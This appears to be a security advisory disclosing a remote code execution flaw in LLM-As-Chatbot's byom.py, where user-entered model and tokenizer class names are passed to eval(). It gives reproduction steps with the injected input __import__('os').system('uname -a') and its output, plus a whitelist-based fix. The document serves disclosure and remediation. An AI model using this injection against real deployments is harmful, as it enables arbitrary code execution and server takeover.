LLM-As-Chatbot/models/byom.py has an remote code execution vulnerability in https://github.com/deep-diver/LLM-As-Chatbot/

Credit：Bac0nj and 7resp4ss, with the assistance of our AI code reviewer SecWatcher

Description

When the user uploads a model, an attacker can execute any python code.

# byom.py L-6
def load_model(
    base,
    finetuned,
    mode_cpu,
    mode_mps,
    mode_full_gpu,
    mode_8bit,
    mode_4bit,
    # force_download_ckpt,
    model_cls,
    tokenizer_cls
):
    if tokenizer_cls is None:
        tokenizer_cls = AutoTokenizer
    else:
        tokenizer_cls = eval(tokenizer_cls)

    if model_cls is None:
        model_cls = AutoModelForCausalLM
    else:
        model_cls = eval(model_cls)

Proof of Concept

build

git clone <https://github.com/deep-diver/LLM-As-Chatbot.git>
cd LLM-As-Chatbot
pip install -r requirements.txt

reproduce

• Run in terminal: app.py. It will output the following:

$python app.py
/home/poc/anaconda3/envs/llm-serve/lib/python3.9/site-packages/auto_gptq/nn_modules/triton_utils/kernels.py:411: FutureWarning: `torch.cuda.amp.custom_fwd(args...)` is deprecated. Please use `torch.amp.custom_fwd(args..., device_type='cuda')` instead.
  def forward(ctx, input, qweight, scales, qzeros, g_idx, bits, maxq):
/home/poc/anaconda3/envs/llm-serve/lib/python3.9/site-packages/auto_gptq/nn_modules/triton_utils/kernels.py:419: FutureWarning: `torch.cuda.amp.custom_bwd(args...)` is deprecated. Please use `torch.amp.custom_bwd(args..., device_type='cuda')` instead.
  def backward(ctx, grad_output):
/home/poc/anaconda3/envs/llm-serve/lib/python3.9/site-packages/auto_gptq/nn_modules/triton_utils/kernels.py:461: FutureWarning: `torch.cuda.amp.custom_fwd(args...)` is deprecated. Please use `torch.amp.custom_fwd(args..., device_type='cuda')` instead.
  @custom_fwd(cast_inputs=torch.float16)
CUDA extension not installed.
CUDA extension not installed.
Running on local URL:  <http://0.0.0.0:6006>

To create a public link, set `share=True` in `launch()`.

• Then in a web browser, visit the running url

  

• Click "custom model" button then it will jump to this page:

  

• In Base model class and Base tokenizer class input slot in Advanced options, enter the python code chosen by attacker. Here we use __import__('os').system('uname -a') for testing. And then click the Confirm button below will trigger the code execution.

  

  In the terminal we can see the code has been executed:

Running on local URL:  <http://0.0.0.0:6006>

To create a public link, set `share=True` in `launch()`.
Linux VICTIM 6.8.0-48-generic #48-Ubuntu SMP PREEMPT_DYNAMIC Fri Sep 27 14:04:52 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
Linux VICTIM 6.8.0-48-generic #48-Ubuntu SMP PREEMPT_DYNAMIC Fri Sep 27 14:04:52 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
tokenizer_cls: 0
model_cls: 0
Traceback (most recent call last):

Fix Suggestion

It's possible to avoid eval and use a safer alternative, replace eval with a controlled mapping of allowed model and tokenizer classes. Ensure user input for model and tokenizer selection is validated against a strict whitelist of expected class names. Reject or escape inputs that do not match the allowed format (e.g., regex for valid class names). Avoid dynamic imports or runtime evaluation. Instead, use dependency injection or configuration files to load required models or tokenizers.

Impact

This vulnerability allows attackers to execute arbitrary Python code, potentially leading to full server compromise. This includes unauthorized access to sensitive data, manipulation of model behavior, deployment of malicious code, or complete server control.

Note